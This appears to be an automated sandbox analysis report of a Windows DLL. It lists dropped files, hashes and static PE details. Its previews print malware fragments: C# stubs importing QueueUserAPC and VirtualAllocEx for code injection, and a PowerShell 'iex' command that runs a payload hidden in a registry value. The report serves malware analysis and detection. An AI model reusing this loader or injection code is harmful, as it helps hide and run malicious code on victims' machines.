                                                                                                                                    Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...f.1.l.r.e.r.x.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...f.1.l.r.e.r.x.f...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                    C:\Users\user\AppData\Local\Temp\f1lrerxf\f1lrerxf.0.cs
                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:UTF-8 Unicode (with BOM) text
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):411
                                                                                                                                    Entropy (8bit):5.022568322197063
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:6:V/DsYLDS81zuJwQ5mMRSR7a1yTyShSRa+rVSSRnA/fh14v02JKy:V/DTLDfuqRySQ9rV5nA/TDy
                                                                                                                                    MD5:9B2165E59D51BB6E8E99190BD9C6BC8B
                                                                                                                                    SHA1:02B2F188D7654CA079ADA726994D383CF75FF114
                                                                                                                                    SHA-256:36E14435EE02B02C2B06087FF3750569342E8B8D8571F3F45E61AF50D3B03CEA
                                                                                                                                    SHA-512:20E05DE0D57D1F6F53FB3290CB1C533D152C6076E2451B0A463D5AD6342976F49F31DDA8CC668E3EC26775E75EE191B8DD44645F40F723667EE8376C84998209
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class tseeoxqndt. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr jphxxkfdthf,IntPtr lnf,IntPtr uet);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint wwqqeyldba,uint ccghpcxllqj,IntPtr tobsn);.. }..}.
                                                                                                                                    C:\Users\user\AppData\Local\Temp\f1lrerxf\f1lrerxf.cmdline
                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):375
                                                                                                                                    Entropy (8bit):5.197786234514801
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fzdZLdWzxs7+AEszIN723fzdZLdrn:p37Lvkmb6K2a7nwWZETa7nt
                                                                                                                                    MD5:734007057FDE86BAC082B20BD7726DE7
                                                                                                                                    SHA1:6F0C054B6333F2A4C97ACC181B6ED06841535426
                                                                                                                                    SHA-256:1E60A23537A2F720129BB863B7FBBC10542C4A1CCF53DC3635261A60626C5714
                                                                                                                                    SHA-512:D0A4C03223E42227E89B0C770C64115E5515630923F48903C1723B85533F2919C03ED529A1BE956136E8F1E50F34DD55CB20BE590FE1DD024A739FA86FF9CD04
                                                                                                                                    Malicious:true
                                                                                                                                    Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\f1lrerxf\f1lrerxf.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\f1lrerxf\f1lrerxf.0.cs"
                                                                                                                                    C:\Users\user\AppData\Local\Temp\f1lrerxf\f1lrerxf.dll
                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):3584
                                                                                                                                    Entropy (8bit):2.6309793787133975
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:etGSvm8+mDR853RY0JGD4lp2tkZfkaDZ0hEdI+ycuZhNC3akSzgPNnq:6vwmS5+4jJkcZ6Ed1ulIa3Uq
                                                                                                                                    MD5:F24FEFA4EE7E99549CE5072CB4CF767B
                                                                                                                                    SHA1:C39A5E46DD4A6F84A1106C47C7FC3C58576E5A27
                                                                                                                                    SHA-256:811758515C92DDD9D681A7B2C48B1E7E712FAECD190656CC0020919F1A22A540
                                                                                                                                    SHA-512:062C33194BB6D8956CE8F517D5642B2790E8824685A6312EE3B2FE52BAF4EB83695037AB049754C48707B34EEC0DF4C737395452C0F1C257E8F5E37E7FDC4B32
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................6./...............%.......................".............. =............ J............ ].....P ......h.........n.....z.....~.....................h. ...h...!.h.%...h.......*.....3.8.....=.......J.......].......................................&........<Module>.f1lrerxf.dll.tseeoxqndt.W32.mscorl
                                                                                                                                    C:\Users\user\AppData\Local\Temp\f1lrerxf\f1lrerxf.out
                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                    File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                    Category:modified
                                                                                                                                    Size (bytes):412
                                                                                                                                    Entropy (8bit):4.871364761010112
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                                                                                                    MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                                                                                                    SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                                                                                                    SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                                                                                                    SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                    C:\Users\user\AppData\Local\Temp\ntdrbunx\CSC5967AF4362DF4FAC8293E16849360B0.TMP
                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                    File Type:MSVC .res
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):652
                                                                                                                                    Entropy (8bit):3.0845700612573927
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grysqak7Ynqq9bPN5Dlq5J:+RI+ycuZhNXakS5PNnqX
                                                                                                                                    MD5:B2979466D8579E0785E5064C8CE921F1
                                                                                                                                    SHA1:670D138D3A628DB0152A506F5ECB9C0CF9609A40
                                                                                                                                    SHA-256:FEED5B32BB7B288F8B1905BFE55FA9911E478AFB5B49FFEFC785E2CB3DF4DFF1
                                                                                                                                    SHA-512:3411629BD6F167A6A61FDBD52C983DC529EFCA866BB409AB85B634ED11A69A02280B67D990A45166A7276EBB89A315F23A570EBD6E2B44BFD08937ECCF89575B
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.t.d.r.b.u.n.x...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...n.t.d.r.b.u.n.x...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                    C:\Users\user\AppData\Local\Temp\ntdrbunx\ntdrbunx.0.cs
                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:UTF-8 Unicode (with BOM) text
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):413
                                                                                                                                    Entropy (8bit):4.95469485629364
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:6:V/DsYLDS81zuJAMRSRa+eNMjSSRrEMx9SRHq1DAfWZSEehEFQy:V/DTLDfuA9eg5rEMx8u25hZy
                                                                                                                                    MD5:66C992425F6FC8E496BCA0C59044EDFD
                                                                                                                                    SHA1:9900C115A66028CD4E43BD8C2D01401357FD7579
                                                                                                                                    SHA-256:85FEE59EDA69CF81416915A84F0B8F7D8980A3A582B5FA6CC27A8C1340838B6C
                                                                                                                                    SHA-512:D674884748328A261D3CB4298F2EB63B37A77182869C5E3B462FAB917631FC1A6BB9B266CAD4E627F68C3016A2EEADCD508FDDBAF818E2F12E51B97325D9406D
                                                                                                                                    Malicious:true
                                                                                                                                    Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class iteocetkyp. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint hmli,uint odfa);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr cieceahsrf,IntPtr qipockeo,uint fmaounwoa,uint hdhq,uint fssner);.. }..}.
                                                                                                                                    C:\Users\user\AppData\Local\Temp\ntdrbunx\ntdrbunx.cmdline
                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):375
                                                                                                                                    Entropy (8bit):5.179763622265848
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fgU4zxs7+AEszIN723fgUzx:p37Lvkmb6K2a6WZETaf
                                                                                                                                    MD5:FFAF9778B98D9FC34162F4CCFFEF61BC
                                                                                                                                    SHA1:7601F6A7960342F9BF8220C421330FFE5EAA65BA
                                                                                                                                    SHA-256:C3BA1254F8A54D7688038485699D86BD68112485C5A8B9689678CD1FE4470709
                                                                                                                                    SHA-512:B27ECD33A04005B7169ABC2F25B517A32034FC5EDD2FEEB00A4BB862B6ACC1F01A05EDD4874EBE6445590B22EB0F492272421CA67D3E8E7F7BD10618BB18B903
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ntdrbunx\ntdrbunx.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ntdrbunx\ntdrbunx.0.cs"
                                                                                                                                    C:\Users\user\AppData\Local\Temp\ntdrbunx\ntdrbunx.dll
                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):3584
                                                                                                                                    Entropy (8bit):2.6121099409461683
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:etGSLmM+WEei8MT38s2EGxcadWC0PtkZf5Bbaw7I+ycuZhNXakS5PNnq:6Lg7qMTMpEGxc0WCdJ5F1ulXa37q
                                                                                                                                    MD5:4B491C2E080EB27EEFB6D132BB66DC80
                                                                                                                                    SHA1:7FC5FAB40120746D8657889B078788CCE466A15A
                                                                                                                                    SHA-256:EF207673335C13E92DB1F4F20BA4ECC339F5141C363F7EBFD6A19006DA7CE245
                                                                                                                                    SHA-512:2DB7DDA69AAB7935A2E7FD736D19F6BAEE801C1D6CB3DFD516A3C6A19A607C381E7C2142288B649D9F6E7F2BF8FF3D08CD85B5ABE3A5310915FD8A899EFB60BC
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................6./...............&.......................".............. =............ O............ W.....P ......f.........l.....q.....v...........................f.!...f...!.f.&...f.......+.....4.9.....=.......O.......W.......................................&..........<Module>.ntdrbunx.dll.iteocetkyp.W3
                                                                                                                                    C:\Users\user\AppData\Local\Temp\ntdrbunx\ntdrbunx.out
                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                    File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                    Category:modified
                                                                                                                                    Size (bytes):412
                                                                                                                                    Entropy (8bit):4.871364761010112
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                                                                                                    MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                                                                                                    SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                                                                                                    SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                                                                                                    SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                    C:\Users\user\AppData\Local\Temp\~DF425C0EC5FC425F92.TMP
                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):40049
                                                                                                                                    Entropy (8bit):0.6528520308465264
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:kBqoxKAuqR+FrJ4bSoQhcw+oQhcWoQhcT:kBqoxKAuqR+FrJ4bSvKpvKWvKT
                                                                                                                                    MD5:7425BAD5F163D6DD38EB0B073575682D
                                                                                                                                    SHA1:1FC2753718D5F183BAFE12FAA0E43F49CB66A915
                                                                                                                                    SHA-256:A509D337F9BCB01094684274708EE69F2F26EE847C36FC2B161E0260A2B32475
                                                                                                                                    SHA-512:11F6E7231CBDDA35F48B70316A3BA5A560CC0F4C9CCD00C30FA5F78BE5249D0E49D3D14B6CD4894F1785822F4002084E1519E9E380E9F7CE373C32550BBEC620
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                    C:\Users\user\AppData\Local\Temp\~DF75DD507BDBD79E0A.TMP
                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):13269
                                                                                                                                    Entropy (8bit):0.6187229069497634
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:c9lLh9lLh9lIn9lIn9lobS9lobC9lWbvFva4FvEGzQeLmzQelKm9v5+9mNLhm5+3:kBqoIBHYgm/ac
                                                                                                                                    MD5:2A30FF1C001DF3448F2898D696523C4D
                                                                                                                                    SHA1:5AF508D3993BFDEAAF0A88BBEB1328D8E6AEDF0E
                                                                                                                                    SHA-256:59B9B94BED02DDE53F9191E209CD5F0393BCDF5232AEA8DEA8C5FC7E3436B6AD
                                                                                                                                    SHA-512:0267416A9228BF2E7CCAA957415F92A63D39DBF92C550DEB4DEE3C7C40AD99970F57ACF595383A9404F35D33767D8B8FDE3D704171B7B7DD1AA00421C259F302
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                    C:\Users\user\AppData\Local\Temp\~DFECB26E6AA4CF70B6.TMP
                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):40193
                                                                                                                                    Entropy (8bit):0.6801157905354142
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:96:kBqoxKAuvScS+1bZILYfkSUjCV00KfkSUjCV0KkSUjCV03:kBqoxKAuqR+1bZILakSvK1kSvKKkSvK3
                                                                                                                                    MD5:AF1417ADFC86AAAE4062906842023D8B
                                                                                                                                    SHA1:20D9807F83EE9EFC56982A5DF00328225C114DF3
                                                                                                                                    SHA-256:D3B3B7147DAD1D32C9FC28D987CA451D111A0C4C3D423957D8198A7C86BB3BE3
                                                                                                                                    SHA-512:9142540CCB36705025E33BF1B4763F531EE104124024146C29F651272BFEEC954B6BBE59DB115DE5F14238A9CAA38C8271DCBFEBF41789D5BD766816B5D5A2BF
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                    C:\Users\user\AppData\Local\Temp\~DFF4CA7C27392C9284.TMP
                                                                                                                                    Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):40057
                                                                                                                                    Entropy (8bit):0.654866667409696
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:kBqoxKAuqR+lLpY7mCfkgX8hFCfkgX8h+CfkgX8hD:kBqoxKAuqR+lLpY7mxgM3xgMYxgM1
                                                                                                                                    MD5:D2DE8E55E9A4A457CC3CA5C755CA3FB5
                                                                                                                                    SHA1:681FD5399EA0FA57776592A9B78026DE8E5990DD
                                                                                                                                    SHA-256:285F86389607C19673569851C9735033A2718694F8C1859858FDF303395B6DB6
                                                                                                                                    SHA-512:38F097A0D44FAAA670D0905D741B95F311DBF141FD60D09396B5622FEF60220278BECF75F6D1096043AB3082F77261A2BE2A72CCF2152B1CDFC047DEC7B7591D
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                    C:\Users\user\Documents\20210122\PowerShell_transcript.358075.gXRjCJFS.20210122191044.txt
                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1195
                                                                                                                                    Entropy (8bit):5.306961528943474
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24:BxSAey7vBVLOx2DOXUWOLCHGIYBtLWRHjeTKKjX4CIym1ZJX/OLCHGIYBtmDnxSg:BZ1vTLOoORF/RqDYB1ZXFVDZZnH
                                                                                                                                    MD5:F722724413A23F3C044448303342E467
                                                                                                                                    SHA1:7C6BA9084C86B6ADA44CF7E555488A404CFC5E57
                                                                                                                                    SHA-256:3A0FC22BB8741CB272FF19EEBA16F76EC2DDFF825779C2F26CBE27C9FBE47C51
                                                                                                                                    SHA-512:D3B94548635E77B6B0B9288F39BCFF5AEF58E14BBC04CE8D255A90875126F0AEC6A56C169DBA597983B32A29702181FCF8CCAF9453082DD576F4608B4CB9562F
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20210122191044..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 358075 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))..Process ID: 5536..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210122191044..**********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))..******************

                                                                                                                                    Static File Info

                                                                                                                                    General

                                                                                                                                    File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                    Entropy (8bit):7.188381760567774
                                                                                                                                    TrID:
                                                                                                                                    • Win32 Dynamic Link Library (generic) (1002004/3) 98.12%
                                                                                                                                    • Windows Screen Saver (13104/52) 1.28%
                                                                                                                                    • Win16/32 Executable Delphi generic (2074/23) 0.20%
                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                    • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                    File name:out.dll
                                                                                                                                    File size:97624
                                                                                                                                    MD5:2ff0ff62b5cf7e7097f75a37492f02f8
                                                                                                                                    SHA1:9d60d24299762f4aa7fa71838b58e4e747b95df6
                                                                                                                                    SHA256:09029ff1f317ccfdd92bfd8ae154328748e761231aabb51872e2b1204315f285
                                                                                                                                    SHA512:dc9a5422b9f49910db2ad66d4b4d010fb538e6c12e214c33b4b5ee3c5b96591d251b17d9ff99a7dea83b25b62e6ec521a7292471f42def6cb00b2fa139a9eea6
                                                                                                                                    SSDEEP:1536:++1zZBWnnHQO9+zA3PG713sAOFU+okuVLmF5tP3qx9mlmDea8ViioQ+Qc:ZvWwO9+zAe71JykkuYF5tv7lmMiic
                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G8.`...........!...2.N...........".......`.............................................................................

                                                                                                                                    File Icon

                                                                                                                                    Icon Hash:74f0e4ecccdce0e4

                                                                                                                                    Static PE Info

                                                                                                                                    General

                                                                                                                                    Entrypoint:0x10002200
                                                                                                                                    Entrypoint Section:.text
                                                                                                                                    Digitally signed:true
                                                                                                                                    Imagebase:0x10000000
                                                                                                                                    Subsystem:windows gui
                                                                                                                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
                                                                                                                                    DLL Characteristics:
                                                                                                                                    Time Stamp:0x60093847 [Thu Jan 21 08:16:07 2021 UTC]
                                                                                                                                    TLS Callbacks:
                                                                                                                                    CLR (.Net) Version:
                                                                                                                                    OS Version Major:4
                                                                                                                                    OS Version Minor:0
                                                                                                                                    File Version Major:4
                                                                                                                                    File Version Minor:0
                                                                                                                                    Subsystem Version Major:4
                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                    Import Hash:e3b0a59df92b32d95b1d0e02c0a3f703

                                                                                                                                    Authenticode Signature

                                                                                                                                    Signature Valid:false
                                                                                                                                    Signature Issuer:CN=MESZLFMVGYMDDPRFPU
                                                                                                                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                    Error Number:-2146762487
                                                                                                                                    Not Before, Not After
                                                                                                                                    • 1/20/2021 11:16:40 PM 12/31/2039 3:59:59 PM
                                                                                                                                    Subject Chain
                                                                                                                                    • CN=MESZLFMVGYMDDPRFPU
                                                                                                                                    Version:3
                                                                                                                                    Thumbprint MD5:B97CD06010553083DF0FD21EB212C26A
                                                                                                                                    Thumbprint SHA-1:F8C202FCA723B8CAEC047328182C2826D81590E2
                                                                                                                                    Thumbprint SHA-256:E8E49A6B98BCF788AE947712DB427F362FD7193ED374310290440D0F7E08A1EA
                                                                                                                                    Serial:D70633037CBB62984E17FB68A80392B5

                                                                                                                                    Entrypoint Preview

                                                                                                                                    Instruction
                                                                                                                                    push ebp
                                                                                                                                    mov ebp, esp
                                                                                                                                    sub esp, 00000098h
                                                                                                                                    mov dword ptr [ebp-08h], 00001AC9h
                                                                                                                                    mov dword ptr [ebp-04h], 00000000h
                                                                                                                                    mov dword ptr [ebp-08h], 00001AC9h
                                                                                                                                    mov dword ptr [ebp-08h], 00001AC9h
                                                                                                                                    mov dword ptr [ebp-08h], 00001AC9h
                                                                                                                                    mov dword ptr [ebp-08h], 00001AC9h
                                                                                                                                    mov dword ptr [ebp-08h], 00001AC9h
                                                                                                                                    mov dword ptr [ebp-08h], 00001AC9h
                                                                                                                                    mov dword ptr [ebp-08h], 00001AC9h
                                                                                                                                    mov dword ptr [ebp-08h], 00001AC9h
                                                                                                                                    mov dword ptr [ebp-08h], 00001AC9h
                                                                                                                                    mov dword ptr [ebp-08h], 00001AC9h
                                                                                                                                    mov ecx, dword ptr [ebp+08h]
                                                                                                                                    mov dword ptr [10017BF4h], ecx
                                                                                                                                    mov dword ptr [10017BD4h], ebp
                                                                                                                                    mov dword ptr [ebp-14h], 00000001h
                                                                                                                                    mov dword ptr [ebp-1Ch], 00000001h
                                                                                                                                    mov dword ptr [ebp-24h], 00000001h
                                                                                                                                    mov dword ptr [ebp-0Ch], 00000001h
                                                                                                                                    mov dword ptr [ebp-10h], 00000001h
                                                                                                                                    mov dword ptr [ebp-18h], 00000001h
                                                                                                                                    mov dword ptr [ebp-20h], 00000001h
                                                                                                                                    mov eax, dword ptr [ebp-14h]
                                                                                                                                    push eax
                                                                                                                                    call dword ptr [100140C8h]
                                                                                                                                    mov ecx, dword ptr [ebp-18h]
                                                                                                                                    push ecx
                                                                                                                                    call dword ptr [10014474h]
                                                                                                                                    call dword ptr [100140CCh]
                                                                                                                                    push 100130D4h
                                                                                                                                    call dword ptr [100140C4h]
                                                                                                                                    mov dword ptr [ebp-28h], 00000064h

                                                                                                                                    Data Directories

                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x130e00xc8.data
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x168000x1558
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x180000x94c.reloc
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x13d380xb90.data
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                    Sections

                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                    .text0x10000x4d620x4e00False0.150290464744data4.63751083411IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                    .data20x60000x640x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
